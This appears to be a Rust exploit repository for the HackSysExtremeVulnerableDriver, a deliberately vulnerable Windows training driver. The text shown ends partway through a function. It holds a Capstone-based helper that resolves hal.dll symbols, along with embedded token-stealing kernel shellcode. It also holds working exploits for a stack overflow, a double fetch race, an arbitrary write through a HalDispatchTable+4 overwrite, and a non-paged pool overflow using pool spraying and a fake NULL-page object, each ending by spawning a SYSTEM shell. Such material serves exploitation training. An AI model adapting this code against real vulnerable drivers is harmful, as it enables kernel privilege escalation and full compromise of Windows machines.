14 | fn resolve_hal4(filename : &str) -> Option {
15 | println! ("Parsing {}", filename);
16 | let mut pe_file = PeFile::parse_file(filename);
17 |
18 | let base_addr = match pe_file.base() {
19 | Some (v) => v,
20 | None => return None,
21 | };
22 |
23 | println! ("hal.dll base : 0x{:x}", base_addr);
24 |
25 | let addr_hal_init_system = pe_file.resolve("HalInitSystem");
26 | println! ("HalInitSystem RVA : 0x{:x}", addr_hal_init_system);
27 |
28 | let s_name = pe_file.unresolve(addr_hal_init_system);
29 |
30 | let mut bytecode : [ u8; 512 ] = [ 0; 512 ];
31 | pe_file.read(base_addr + addr_hal_init_system, &mut bytecode);
32 |
33 | let cs_handle;
34 |
35 | if pe_file.is_32bits() {
36 | cs_handle = Capstone::new()
37 | .x86()
38 | .mode(arch::x86::ArchMode::Mode32)
39 | .syntax(arch::x86::ArchSyntax::Intel)
40 | .detail(true)
41 | .build();
42 | }
43 | else {
44 | cs_handle = Capstone::new()
45 | .x86()
46 | .mode(arch::x86::ArchMode::Mode64)
47 | .syntax(arch::x86::ArchSyntax::Intel)
48 | .detail(true)
49 | .build();
50 | }
51 |
52 | let cs_handle = match cs_handle {
53 | Ok (v) => {
54 | v
55 | },
56 | Err (e) => {
57 | eprintln! ("Error: {}", e);
58 | panic! ("Bye");
59 | }
60 | };
61 |
62 | // search for HalpSystem
63 | println! ("[+] Looking up for HalpInitSystem");
64 | let mut found_halp = false;
65 | let mut idx = 0;
66 | let mut addr_dis = addr_hal_init_system;
67 | let mut line = String::with_capacity(64);
68 | let mut got_jmp = false;
69 | let mut HalpInitSystem = 0;
70 | while idx < bytecode.len() {
71 | let insns = match cs_handle.disasm_count(&bytecode[idx..], addr_dis, 1) {
72 | Ok (insns) => {
73 | insns
74 | },
75 | Err (e) => {
76 | return None;
77 | },
78 | };
79 |
80 | let mut iter_insn = insns.iter();
81 | let insn = match iter_insn.next() {
82 | Some (v) => v,
83 | None => return None,
84 | };
85 |
86 | line.write_fmt(format_args!("0x{:08x} : ", addr_dis));
87 |
88 | if let Some(mnemonic) = insn.mnemonic() {
89 | line.write_fmt(format_args!("{}", mnemonic));
90 | }
91 | if let Some(op_str) = insn.op_str() {
92 | line.write_fmt(format_args!(" {}", op_str));
93 | }
94 | //println! ("{}", line);
95 |
96 | if let Some(mnemonic) = insn.mnemonic() {
97 | if mnemonic == "jmp" {
98 | got_jmp = true;
99 | }
100 | }
101 |
102 | if got_jmp {
103 | let detail = cs_handle.insn_detail(&insn).expect("Could not get detail");
104 | let arch_detail = detail.arch_detail();
105 | let arch_ops = arch_detail.operands();
106 |
107 | for op in arch_ops {
108 | //println! ("op: {:?}", op);
109 | let operand = match op {
110 | ArchOperand::X86Operand(myop) => {
111 | myop
112 | },
113 | _ => continue,
114 | };
115 |
116 | match operand.op_type {
117 | X86OperandType::Imm(value) => {
118 | found_halp = true;
119 | HalpInitSystem = base_addr + value as u64;
120 | break;
121 | },
122 | _ => break,
123 | }
124 | }
125 |
126 | // stop disas if no halp
127 | break;
128 | }
129 |
130 | idx += insn.bytes().len();
131 | addr_dis += insn.bytes().len() as u64;
132 | line.clear();
133 | }
134 |
135 | if found_halp == false {
136 | println! ("Failed finding HalpInitSystem");
137 | return None;
138 | }
139 |
140 | println! ("-> HalpInitSystem : 0x{:x}", HalpInitSystem - base_addr);
141 |
142 | println! ("[+] Looking up for HaliQuerySystemInformation");
143 |
144 | pe_file.read(HalpInitSystem, &mut bytecode);
145 |
146 | idx = 0;
147 | addr_dis = HalpInitSystem;
148 | line.clear();
149 | got_jmp = false;
150 | let mut found_dispatch = false;
151 | let mut found_insn = false;
152 | let mut HaliQuerySystemInformation = None;
153 | let off_hal_4;
154 | if pe_file.is_32bits() {
155 | off_hal_4 = 4;
156 | }
157 | else {
158 | off_hal_4 = 16;
159 | }
160 |
161 | while idx < bytecode.len() {
162 | let insns = match cs_handle.disasm_count(&bytecode[idx..], addr_dis, 1) {
163 | Ok (insns) => {
164 | insns
165 | },
166 | Err (e) => {
167 | return None;
168 | },
169 | };
170 |
171 | let mut iter_insn = insns.iter();
172 | let insn = match iter_insn.next() {
173 | Some (v) => v,
174 | None => return None,
175 | };
176 |
177 | line.write_fmt(format_args!("0x{:08x} : ", addr_dis));
178 |
179 | if let Some(mnemonic) = insn.mnemonic() {
180 | line.write_fmt(format_args!("{}", mnemonic));
181 | }
182 | if let Some(op_str) = insn.op_str() {
183 | line.write_fmt(format_args!(" {}", op_str));
184 | }
185 | //println! ("{}", line);
186 |
187 | if let Some(mnemonic) = insn.mnemonic() {
188 | if mnemonic == "mov" {
189 | got_jmp = true;
190 | }
191 | }
192 |
193 | if got_jmp {
194 | let detail = cs_handle.insn_detail(&insn).expect("Could not get detail");
195 | let arch_detail = detail.arch_detail();
196 | let arch_ops = arch_detail.operands();
197 |
198 | for op in arch_ops {
199 | let operand = match op {
200 | ArchOperand::X86Operand(myop) => {
201 | myop
202 | },
203 | _ => continue,
204 | };
205 |
206 | match operand.op_type {
207 | X86OperandType::Mem(op_mem) => {
208 | // check that we got the HalDispatchTable
209 | if op_mem.disp() as u64 == base_addr + pe_file.i_resolve("HalDispatchTable") {
210 | //println! ("Got dispatch table");
211 | found_dispatch = true;
212 | }
213 | // now check that we're trying to patch the HalDispatchTable+4
214 | if found_dispatch && op_mem.disp() == off_hal_4 {
215 | found_insn = true;
216 | }
217 | },
218 | X86OperandType::Imm(v) => {
219 | //if found_insn {
220 | if found_insn {
221 | HaliQuerySystemInformation = Some (v as u64 - base_addr);
222 | break;
223 | }
224 | },
225 | _ => continue,
226 | }
227 | }
228 |
229 | // we found it
230 | if let Some (success) = HaliQuerySystemInformation {
231 | break;
232 | }
233 |
234 | got_jmp = false;
235 | }
236 |
237 | idx += insn.bytes().len();
238 | addr_dis += insn.bytes().len() as u64;
239 | line.clear();
240 | }
241 |
242 | HaliQuerySystemInformation
243 | }
244 |
245 | fn main() {
246 | let HaliQuerySystemInformation = match resolve_hal4("hal.dll") {
247 | Some (v) => v,
248 | None => {
249 | eprintln! ("Failed resolving HaliQuerySystemInformation");
250 | return;
251 | },
252 | };
253 | println! ("-> HaliQuerySystemInformation : 0x{:x}", HaliQuerySystemInformation);
254 | }
255 |
256 |
--------------------------------------------------------------------------------
/src/main.rs:
--------------------------------------------------------------------------------
1 | #[cfg(windows)] extern crate winapi;
2 | #[cfg(windows)] extern crate kernel32;
3 | #[cfg(windows)] extern crate psapi;
4 |
5 | use std::io::{stdin,stdout,Write};
6 |
7 | use std::ptr;
8 | use std::thread;
9 |
10 | use std::sync::atomic::{AtomicBool, Ordering};
11 | use std::sync::{Arc, Mutex};
12 | use std::rc::Rc;
13 |
14 | extern crate byteorder;
15 | use byteorder::{LittleEndian, WriteBytesExt};
16 |
17 | use std::process::Command;
18 | use std::process;
19 |
20 | #[cfg(windows)]
21 | fn open_device() -> std::os::windows::raw::HANDLE {
22 | use std::ffi::CString;
23 | use kernel32::CreateFileA;
24 |
25 | let hev_device;
26 | unsafe {
27 | hev_device = CreateFileA(CString::new("\\\\.\\HackSysExtremeVulnerableDriver").unwrap().as_ptr(), 0xC0000000, 0, ptr::null_mut(), 0x3, 0, ptr::null_mut());
28 | }
29 | if hev_device == ptr::null_mut() {
30 | panic! ("Failed opening device!");
31 | }
32 |
33 | hev_device
34 | }
35 |
36 | fn check_priv(priv_name : &str) -> bool {
37 | use std::ffi::CString;
38 | use kernel32::GetLastError;
39 | use winapi::um::winbase::LookupPrivilegeValueA;
40 | use winapi::shared::winerror::ERROR_NO_TOKEN;
41 | use winapi::shared::minwindef::{BOOL, LPBOOL};
42 | use winapi::um::securitybaseapi::PrivilegeCheck;
43 | use winapi::um::winnt::{RtlMoveMemory, TOKEN_QUERY, LUID, PRIVILEGE_SET, PRIVILEGE_SET_ALL_NECESSARY, SE_PRIVILEGE_ENABLED};
44 | use winapi::um::processthreadsapi::{OpenThreadToken, GetCurrentThread, OpenProcessToken, GetCurrentProcess};
45 |
46 | let mut hToken = ptr::null_mut();
47 |
48 | unsafe {
49 | // Get the calling thread's access token.
50 | if OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, 1, &mut hToken) == 0 {
51 | if GetLastError() != ERROR_NO_TOKEN {
52 | println! ("CAN'T GET THREAD TOKEN!!!\n");
53 | return false;
54 | }
55 |
56 | // Retry against process token if no thread token exists.
57 | if OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &mut hToken) == 0 {
58 | println! ("CAN'T GET PROCESS TOKEN!!!\n");
59 | return false;
60 | }
61 | }
62 |
63 | //Find the LUID for the debug privilege token
64 | let mut luidDebugPrivilege : LUID = LUID::default();
65 | // lookup privilege on local system
66 | // look for SeDebugPrivilege
67 | // receives LUID
68 | if LookupPrivilegeValueA(ptr::null_mut(), CString::new(priv_name).unwrap().as_ptr(), &mut luidDebugPrivilege) == 0 {
69 | println! ("Failed looking for privilege");
70 | return false;
71 | }
72 |
73 | let mut privs : PRIVILEGE_SET = PRIVILEGE_SET::default();
74 | privs.PrivilegeCount = 1;
75 | privs.Control = PRIVILEGE_SET_ALL_NECESSARY;
76 |
77 | privs.Privilege[0].Luid = luidDebugPrivilege;
78 | privs.Privilege[0].Attributes = SE_PRIVILEGE_ENABLED;
79 |
80 | let mut bResult : BOOL = 0;
81 | PrivilegeCheck(hToken, &mut privs, &mut bResult as LPBOOL);
82 |
83 | return bResult != 0;
84 | }
85 |
86 | false
87 | }
88 |
89 | fn check_system() -> bool {
90 | check_priv("SeImpersonatePrivilege") && check_priv("SeDebugPrivilege") && check_priv("SeLockMemoryPrivilege")
91 | }
92 |
93 | fn get_payload_token_stealing (payload_end : &[u8]) -> Vec {
94 | let mut token_stealing_payload : Vec = vec![
95 | 0x60, // pushad
96 | // Get nt!_KPCR.PcrbData.CurrentThread
97 | 0x31, 0xc0, // xor eax,eax
98 | 0x64, 0x8b, 0x80, 0x24, 0x01, 0x00, 0x00, // mov eax,[fs:eax+0x124]
99 | // Get nt!_KTHREAD.ApcState.Process
100 | 0x8b, 0x40, 0x50, // mov eax,[eax+0x50]
101 | 0x89, 0xc1, // mov ecx,eax
102 | 0xba, 0x04, 0x00, 0x00, 0x00, // mov edx,0x4
103 | // lookup for the system eprocess
104 | 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, // mov eax,[eax+0xb8]
105 | 0x2d, 0xb8, 0x00, 0x00, 0x00, // sub eax,0xb8
106 | 0x39, 0x90, 0xb4, 0x00, 0x00, 0x00, // cmp [eax+0xb4],edx
107 | 0x75, 0xed, // jnz 0x1a
108 |
109 | // get the system token
110 | 0x8b, 0x90, 0xf8, 0x00, 0x00, 0x00, // mov edx,[eax+0xf8]
111 | // patch it in our current eprocess
112 | 0x89, 0x91, 0xf8, 0x00, 0x00, 0x00, // mov [ecx+0xf8],edx
113 |
114 | // Increment the token reference count.
115 | // The PointerCount gets decremented when the process exit.
116 | // If it arrives to 0,
117 | // the SYSTEM TOKEN is freed and this causes a BSoD.
118 | // Here we won't get that BSoD,
119 | // since we "properly" increase the PointerCount.
120 | // OBJECT_HEADER.PointerCount
121 | 0xb9, 0x07, 0x00, 0x00, 0x00, // mov ecx, 7
122 | 0xf7, 0xd1, // not ecx
123 | 0x21, 0xca, // and edx, ecx
124 | // TOKEN-0x18 = Token Object Header
125 | 0x83, 0xea, 0x18, // sub edx, 0x18
126 | // patch PointerCount
127 | // set it to a high value
128 | 0xc7, 0x02, 0x00, 0x00, 0x01, 0x00, // mov dword ptr [edx], 0x10000
129 |
130 | // set NTSTATUS to 0
131 | 0x31, 0xc0, // xor eax,eax \
132 |
133 | 0x61, // popad \
134 | ];
135 |
136 | for byte in payload_end.iter() {
137 | token_stealing_payload.push(*byte);
138 | }
139 |
140 | token_stealing_payload
141 | }
142 |
143 | #[cfg(windows)]
144 | fn exploit_bof_token (cmd : &str) {
145 | use kernel32::{CloseHandle, VirtualAlloc, DeviceIoControl};
146 | use winapi::um::winnt::RtlMoveMemory;
147 |
148 | let payload_end : Vec = vec![
149 | 0x31, 0xc0, // xor eax, eax
150 | 0x5d, // pop ebp
151 | 0xc2, 0x08, 0x00, // ret 0x8
152 | ];
153 | let payload = get_payload_token_stealing(&payload_end);
154 | let mut n_read : u32 = 0;
155 |
156 | let len_payload = payload.len();
157 |
158 | println! ("\n== Stack Overflow Exploitation\n");
159 |
160 | unsafe {
161 | println! ("[+] Allocating shellcode space");
162 | let ptr = VirtualAlloc(ptr::null_mut(), len_payload as u32, 0x3000, 0x40);
163 | println! ("[+] Copying shellcode");
164 | RtlMoveMemory(ptr as *mut winapi::ctypes::c_void, payload.as_ptr() as *const winapi::ctypes::c_void, len_payload);
165 |
166 | println! ("[+] Preparing attack payload");
167 | let big_buf : [ u8; 2080 ] = [ 0x41; 2080 ];
168 | let mut buf : Vec = Vec::with_capacity(2084);
169 |
170 | for byte in big_buf.iter() {
171 | buf.push(*byte);
172 | }
173 |
174 | buf.write_u32::(ptr as u32).unwrap();
175 |
176 | println! ("[+] Opening device");
177 | let hev_device = open_device();
178 |
179 | println! ("[+] Triggering vuln");
180 | DeviceIoControl(hev_device, 0x222003, buf.as_ptr() as *mut std::os::raw::c_void, buf.len() as u32, ptr::null_mut(), 0, &mut n_read, ptr::null_mut());
181 |
182 | CloseHandle(hev_device);
183 | }
184 |
185 | if check_system() {
186 | println! ("[+] NT_AUTHORITY\\SYSTEM shell incoming");
187 | let mut child = Command::new(cmd).spawn().expect("Failed to execute command");
188 | let _ecode = child.wait()
189 | .expect("failed to wait on child");
190 | }
191 | else {
192 | println! ("[-] Failed getting SYSTEM");
193 | }
194 | }
195 |
196 | #[cfg(windows)]
197 | fn exploit_double_fetch (cmd : &str) {
198 | use kernel32::{CloseHandle, VirtualAlloc, DeviceIoControl};
199 | use winapi::um::winnt::RtlMoveMemory;
200 |
201 | let payload_end : Vec = vec![
202 | 0x31, 0xc0, // xor eax, eax
203 | 0x5d, // pop ebp
204 | 0xc2, 0x08, 0x00, // ret 0x8
205 | ];
206 | let payload = get_payload_token_stealing(&payload_end);
207 | let mut n_read : u32 = 0;
208 |
209 | let len_payload = payload.len();
210 | let mut exploit_success = Arc::new(AtomicBool::new(false));
211 |
212 | if check_system() == false {
213 | println! ("We're not system yet");
214 | }
215 |
216 | println! ("\n== Stack Overflow Exploitation\n");
217 |
218 | unsafe {
219 | println! ("[+] Allocating shellcode space");
220 | let ptr = VirtualAlloc(ptr::null_mut(), len_payload as u32, 0x3000, 0x40);
221 | println! ("[+] Copying shellcode");
222 | RtlMoveMemory(ptr as *mut winapi::ctypes::c_void, payload.as_ptr() as *const winapi::ctypes::c_void, len_payload);
223 |
224 | println! ("[+] Preparing attack payload");
225 | let big_buf : [ u8; 2080 ] = [ 0x41; 2080 ];
226 | let mut buf : Vec = Vec::with_capacity(2084);
227 |
228 | for byte in big_buf.iter() {
229 | buf.push(*byte);
230 | }
231 |
232 | buf.write_u32::(ptr as u32).unwrap();
233 |
234 | //
235 | println! ("[+] Prepare user structure");
236 | let mut user_obj : Vec = Vec::with_capacity(0x8);
237 | user_obj.write_u32::(buf.as_ptr() as u32).unwrap();
238 | user_obj.write_u32::(0x800).unwrap();
239 |
240 | let mut ptr_obj1 = user_obj.as_ptr() as u32;
241 | let mut ptr_obj2 = user_obj.as_mut_ptr();
242 |
243 | println! ("[+] Starting flipping threads");
244 | for _idx in 0..12 {
245 | let mut flip_success = exploit_success.clone();
246 | thread::spawn( move || {
247 | let mut value : u8 = 0;
248 |
249 | while flip_success.load(Ordering::Relaxed) == false {
250 | value = value ^ 0x24;
251 | ptr::write((ptr_obj1 + 4) as *mut u8, value);
252 | }
253 | });
254 | }
255 |
256 | println! ("[+] Opening device");
257 | let hev_device = open_device();
258 |
259 | println! ("[+] Triggering vuln");
260 | while exploit_success.load(Ordering::Relaxed) == false {
261 | DeviceIoControl(hev_device, 0x222037, ptr_obj2 as *mut std::os::raw::c_void, 0, ptr::null_mut(), 0, &mut n_read, ptr::null_mut());
262 | //println! ("Trying trigger");
263 | if check_system() {
264 | println! ("Got system!");
265 |
266 | exploit_success.store(true, Ordering::Relaxed);
267 | break;
268 | }
269 | }
270 |
271 | CloseHandle(hev_device);
272 | }
273 |
274 | if check_system() {
275 | println! ("[+] NT_AUTHORITY\\SYSTEM shell incoming");
276 | let mut child = Command::new(cmd).spawn().expect("Failed to execute command");
277 | let _ecode = child.wait()
278 | .expect("failed to wait on child");
279 | }
280 | else {
281 | println! ("[-] Failed getting SYSTEM");
282 | }
283 | }
284 |
285 | #[cfg(windows)]
286 | fn lookup_base (module_name : &str) -> Option<(String,usize)> {
287 | let mut drivers_base : Vec = Vec::with_capacity(2048);
288 | let mut n_drivers = drivers_base.capacity() as u32;
289 | let success;
290 |
291 | unsafe {
292 | drivers_base.set_len(n_drivers as usize);
293 | }
294 |
295 | unsafe {
296 | success = psapi::EnumDeviceDrivers(drivers_base.as_ptr() as *mut *mut std::os::raw::c_void, 1024, &mut n_drivers);
297 | }
298 | if success == 0 {
299 | eprintln! ("Failed to enumerate!!!");
300 | return None;
301 | }
302 |
303 | for base_address in drivers_base {
304 | if base_address == 0 {
305 | continue
306 | }
307 |
308 | let mut base_name : [ u8; 1024 ] = [ 0; 1024 ];
309 | let driver_base_name;
310 | unsafe {
311 | driver_base_name = psapi::GetDeviceDriverBaseNameA(base_address as *mut std::os::raw::c_void, base_name.as_ptr() as *mut i8, 48);
312 | }
313 | if driver_base_name == 0 {
314 | eprintln! ("Unable to get driver base name!!!");
315 | continue;
316 | }
317 |
318 | // search for index position to ignore the remaining zeros
319 | let idx_zero = match base_name.iter().position(|&x| x == 0) {
320 | Some (v) => v,
321 | None => base_name.len(),
322 | };
323 | let cname = match std::str::from_utf8(&base_name[..idx_zero]) {
324 | Ok (v) => v,
325 | Err (_e) => {
326 | eprintln! ("Couldn't get string from str");
327 | continue;
328 | },
329 | };
330 |
331 | if cname.to_lowercase() == module_name.to_string().to_lowercase()
332 | || cname.to_lowercase().contains(module_name.to_string().to_lowercase().as_str()) {
333 | return Some ((cname.to_string(), base_address));
334 | }
335 | }
336 |
337 | None
338 | }
339 |
340 | #[cfg(windows)]
341 | fn write4_at (addr : u32, value : u32) {
342 | use kernel32::{ CloseHandle, DeviceIoControl };
343 |
344 | let mut buf_value : Vec = Vec::with_capacity(16);
345 | let mut www : Vec = Vec::with_capacity(16);
346 | let mut n_read : u32 = 0;
347 |
348 | buf_value.write_u32::(value).unwrap();
349 |
350 | www.write_u32::(buf_value.as_ptr() as u32).unwrap();
351 | www.write_u32::(addr).unwrap();
352 |
353 | let hev_device = open_device();
354 |
355 | println! ("-> Writing 0x{:x} to 0x{:x}", value, addr);
356 | unsafe {
357 | DeviceIoControl(hev_device,
358 | 0x22200b,
359 | www.as_ptr() as *mut std::os::raw::c_void,
360 | www.len() as u32,
361 | ptr::null_mut(),
362 | 0,
363 | &mut n_read,
364 | ptr::null_mut());
365 |
366 | CloseHandle(hev_device);
367 | }
368 | }
369 |
370 | #[cfg(windows)]
371 | fn exploit_arbitrary_write (cmd : &str) {
372 | use std::ffi::CString;
373 | use kernel32::{ GetProcAddress };
374 | use kernel32::{ VirtualAlloc, LoadLibraryExA };
375 | use winapi::um::winnt::RtlMoveMemory;
376 |
377 | let payload_end : Vec = vec![
378 | 0x31, 0xc0, // xor eax, eax
379 | 0x83, 0xc4, 0x24, // add esp, byte +0x24
380 | 0x5d, // pop ebp
381 | 0xc2, 0x08, 0x00, // ret 0x8
382 | ];
383 | let payload = get_payload_token_stealing(&payload_end);
384 |
385 | let len_payload = payload.len();
386 |
387 | println! ("\n== Arbitrary Overwrite Exploitation\n");
388 |
389 | println! ("[+] Looking for Windows kernel base");
390 | let mod_ntkrnl = match lookup_base("ntkrnl") {
391 | Some (v) => v,
392 | None => panic! ("Failed resolving ntkrnl base"),
393 | };
394 | let (name_ntkrnl, base_ntkrnl) = mod_ntkrnl;
395 | println! ("-> kernel base : 0x{:x}", base_ntkrnl);
396 | println! ("name : {} addr : 0x{:x}", name_ntkrnl, base_ntkrnl);
397 |
398 | let mod_hal = match lookup_base("hal") {
399 | Some (v) => v,
400 | None => panic! ("Failed resolving hal base"),
401 | };
402 | let (name_hal, base_hal) = mod_hal;
403 | println! ("-> HAL base : 0x{:x}", base_hal);
404 | println! ("name : {} addr : 0x{:x}", name_hal, base_hal);
405 |
406 | let addr_ntkrnl;
407 | let mut addr_hal_dispatch;
408 | unsafe {
409 | println! ("[+] Getting HalDispatchTable offset in ntkrnl");
410 | addr_ntkrnl = LoadLibraryExA(name_ntkrnl.as_ptr() as *const i8, ptr::null_mut(), 1);
411 | if addr_ntkrnl == ptr::null_mut() {
412 | panic! ("Unable to load ntkrnl");
413 | }
414 | println! ("-> ntkrnl base : 0x{:x}", addr_ntkrnl as u32);
415 |
416 | let symbol_name = CString::new("HalDispatchTable").unwrap();
417 | addr_hal_dispatch = GetProcAddress(addr_ntkrnl,
418 | symbol_name.as_ptr() as *const i8);
419 | if addr_hal_dispatch == ptr::null_mut() {
420 | panic! ("Unable to load HAL");
421 | }
422 | let off_hal = addr_hal_dispatch as usize - addr_ntkrnl as usize;
423 | println! ("-> HalDispatchTable uaddr : 0x{:x}", addr_hal_dispatch as u32);
424 | println! ("-> HalDispatchTable offset : 0x{:x}", off_hal);
425 |
426 | println! ("[+] Getting HalDispatchTable kernel address");
427 | addr_hal_dispatch = (base_ntkrnl + off_hal) as *mut std::os::raw::c_void;
428 | println! ("-> HalDispatchTable addr : 0x{:x}", addr_hal_dispatch as usize);
429 | println! ("-> HalDispatchTable+4 addr : 0x{:x}", addr_hal_dispatch as usize + 4);
430 |
431 | println! ("[+] Resolving HaliQuerySystemInformation");
432 | println! ("-> Loading {}", name_hal);
433 | let addr_hal = LoadLibraryExA(name_hal.as_ptr() as *const i8, ptr::null_mut(), 1);
434 | if addr_hal == ptr::null_mut() {
435 | panic! ("Unable to load HAL");
436 | }
437 |
438 | println! ("[+] Allocating shellcode space");
439 | let addr_shellcode = VirtualAlloc(ptr::null_mut(), len_payload as u32, 0x3000, 0x40);
440 | println! ("[+] Copying shellcode to address : 0x{:x}", addr_shellcode as u64);
441 | RtlMoveMemory(addr_shellcode as *mut winapi::ctypes::c_void, payload.as_ptr() as *const winapi::ctypes::c_void, len_payload);
442 |
443 | println! ("[+] Patching HalDispatchTable+4 with shellcode addr");
444 | write4_at(addr_hal_dispatch as u32 + 4, addr_shellcode as u32);
445 |
446 | println! ("[+] Trigger privesc");
447 | let mut interval : Vec = Vec::with_capacity(16);
448 | interval.write_u32::(0).unwrap();
449 | NtQueryIntervalProfile(0x1337 as PVOID, interval.as_ptr() as ULONG_PTR);
450 |
451 | // XXX: dynamically resolve HaliQuerySystemInformation,
452 | println! ("[+] Restoring HalDispatchTable+4 with original value : 0x{:x}", base_hal as u32 + 0x278a2);
453 | write4_at(addr_hal_dispatch as u32 + 4, base_hal as u32 + 0x278a2);
454 | }
455 |
456 | if check_system() {
457 | println! ("[+] NT_AUTHORITY\\SYSTEM shell incoming");
458 | let mut child = Command::new(cmd).spawn().expect("Failed to execute command");
459 | let _ecode = child.wait()
460 | .expect("failed to wait on child");
461 | }
462 | else {
463 | println! ("[-] Failed getting SYSTEM");
464 | }
465 | }
466 |
467 | #[cfg(windows)]
468 | fn pool_spray (n_handles : usize) -> Vec {
469 | use kernel32::CreateEventA;
470 | let mut handles = Vec::with_capacity(n_handles);
471 |
472 | for _idx in 0..n_handles {
473 | let handle;
474 | unsafe {
475 | handle = CreateEventA(ptr::null_mut(), 0, 0, ptr::null_mut());
476 | }
477 | handles.push(handle);
478 | }
479 |
480 | handles
481 | }
482 |
483 | #[cfg(windows)]
484 | fn pool_create_holes (handles : &[std::os::windows::raw::HANDLE], start : usize, end : usize, size : usize) -> usize {
485 | use kernel32::CloseHandle;
486 |
487 | let n_frees = size / 0x40;
488 | let step = 2 * n_frees;
489 | let mut n_holes = 0;
490 |
491 | let mut idx = start;
492 | while idx < end {
493 | for handle in &handles[idx..idx+n_frees] {
494 | unsafe {
495 | CloseHandle(*handle);
496 | }
497 | }
498 |
499 | idx += step;
500 | n_holes += 1
501 | }
502 |
503 | n_holes
504 | }
505 |
506 | #[cfg(windows)]
507 | fn free_handles (handles : &[std::os::windows::raw::HANDLE]) {
508 | use kernel32::CloseHandle;
509 |
510 | for handle in handles {
511 | //println! ("Freeing {:?}", *handle);
512 | unsafe {
513 | CloseHandle(*handle);
514 | }
515 | }
516 | }
517 |
518 | pub enum CVoid {}
519 | pub type CLong = i32;
520 | pub type CUlong = u32;
521 |
522 | pub type HANDLE = *mut CVoid;
523 | pub type PVOID = *mut CVoid;
524 | pub type ULONG_PTR = usize;
525 | pub type PULONG_PTR = *mut usize;
526 | pub type PSIZE_T = *mut ULONG_PTR;
527 | pub type ULONG = CUlong;
528 |
529 | pub type LONG = CLong;
530 | pub type NTSTATUS = LONG;
531 |
532 | #[cfg(windows)]
533 | #[link(name="ntdll")]
534 | extern "stdcall" {
535 | fn NtAllocateVirtualMemory(
536 | ProcessHandle : HANDLE,
537 | //BaseAddress : PVOID,
538 | BaseAddress : PSIZE_T,
539 | ZeroBits : ULONG_PTR,
540 | RegionSize : PSIZE_T,
541 | AllocationType : ULONG,
542 | Protect : ULONG
543 | ) -> NTSTATUS;
544 |
545 | fn NtMapUserPhysicalPages(
546 | ProcessHandle : HANDLE,
547 | NumberOfPages : ULONG_PTR,
548 | UserPfnArray : PULONG_PTR,
549 | ) -> NTSTATUS;
550 |
551 | fn NtQueryIntervalProfile (
552 | ProfileSource : PVOID,
553 | Interval : ULONG_PTR
554 | ) -> NTSTATUS;
555 | }
556 |
557 | #[cfg(windows)]
558 | fn exploit_nonpaged_pool_overflow_token (cmd : &str) {
559 | use kernel32::{CloseHandle, VirtualAlloc, DeviceIoControl};
560 | use winapi::um::winnt::RtlMoveMemory;
561 |
562 | let payload_end : Vec = vec![
563 | 0x31, 0xc0, // xor eax, eax
564 | 0xc2, 0x10, 0x00, // ret 0x10
565 | ];
566 | let payload = get_payload_token_stealing(&payload_end);
567 |
568 | let mut n_read : u32 = 0;
569 |
570 | let len_payload = payload.len();
571 |
572 | println! ("\n== Non-Paged Pool Overflow Exploitation\n");
573 |
574 | unsafe {
575 | println! ("[+] Allocating shellcode space");
576 | let addr_shellcode = VirtualAlloc(ptr::null_mut(), len_payload as u32, 0x3000, 0x40);
577 | println! ("[+] Copying shellcode to address : 0x{:x}", addr_shellcode as u64);
578 | RtlMoveMemory(addr_shellcode as *mut winapi::ctypes::c_void, payload.as_ptr() as *const winapi::ctypes::c_void, len_payload);
579 |
580 | println! ("[+] Prepare NULL Page");
581 | let mut addr_landing : usize = 1;
582 | let mut memsize : usize = 0x1000;
583 | let null_page = NtAllocateVirtualMemory(0xffff_ffff as HANDLE, &mut addr_landing as PSIZE_T, 0, &mut memsize as PSIZE_T, 0x3000, 0x40);
584 | if null_page != 0 {
585 | panic! ("[-] Couldn't allocate NULL page");
586 | }
587 |
588 | println! ("-> Crafting fake OBJECT_TYPE object");
589 |
590 | // the callback we wanna setup
591 | let mut OkayToCloseProcedure : Vec = Vec::with_capacity(16);
592 | OkayToCloseProcedure.write_u32::(addr_shellcode as u32).unwrap();
593 |
594 | // insert our callback
595 | // offset 0x74 is our OkayToCloseProcedure callback
596 | // it gets call when CloseHandle() is called
597 | RtlMoveMemory(0x74 as *mut winapi::ctypes::c_void, OkayToCloseProcedure.as_ptr() as *const winapi::ctypes::c_void, OkayToCloseProcedure.len());
598 |
599 | println! ("[+] Heap Spraying Event objects");
600 | let handles = pool_spray(20000);
601 |
602 | println! ("[+] Create holes of 0x200 bytes");
603 | let n_holes = pool_create_holes (&handles, 10000, 15000, 0x200);
604 | println! ("-> Created {} holes", n_holes);
605 |
606 | println! ("[+] Preparing corruption buffer");
607 | let big_buf : [ u8; 0x1f8 ] = [ 0x41; 0x1f8 ];
608 | let mut buf : Vec = Vec::with_capacity(0x1f8);
609 |
610 | for byte in big_buf.iter() {
611 | buf.push(*byte);
612 | }
613 |
614 | // struct POOL_HEADER
615 | // event pool_header
616 | buf.write_u32::(0x04080040).unwrap();
617 | // event tag
618 | buf.write_u32::(0xee657645).unwrap();
619 |
620 | // struct OBJECT_HEADER_QUOTA_INFO
621 | // PagedPoolCharge
622 | buf.write_u32::(0).unwrap();
623 | // NonPagedPoolCharge
624 | buf.write_u32::(0x40).unwrap();
625 | // SecurityDescriptorCharge
626 | buf.write_u32::(0).unwrap();
627 | // SecurityDescriptorQuotaBlock
628 | buf.write_u32::(0).unwrap();
629 |
630 | // struct OBJECT_HEADER
631 | // PointerCount
632 | buf.write_u32::(1).unwrap();
633 | // HandleCount
634 | buf.write_u32::(1).unwrap();
635 | // Lock
636 | buf.write_u32::(0).unwrap();
637 | // TypeIndex (original value was 0xc)
638 | buf.write_u8(0).unwrap();
639 |
640 | println! ("[+] Opening device");
641 | let hev_device = open_device();
642 |
643 | println! ("[+] Overflowing our buffer");
644 | DeviceIoControl(hev_device, 0x22200f, buf.as_ptr() as *mut std::os::raw::c_void, buf.len() as u32, ptr::null_mut(), 0, &mut n_read, ptr::null_mut());
645 |
646 | println! ("[+] Triggering token stealing payload");
647 | free_handles(&handles);
648 |
649 | CloseHandle(hev_device);
650 | }
651 |
652 | if check_system() {
653 | println! ("[+] NT_AUTHORITY\\SYSTEM shell incoming");
654 | let mut child = Command::new(cmd).spawn().expect("Failed to execute command");
655 | let _ecode = child.wait()
656 | .expect("failed to wait on child");
657 | }
658 | else {
659 | println! ("[-] Failed getting SYSTEM");
660 | }
661 | }
662 |
663 | #[cfg(windows)]
664 | fn alloc_null_page () -> i32 {
665 | let null_page;
666 | let mut addr : usize = 1;
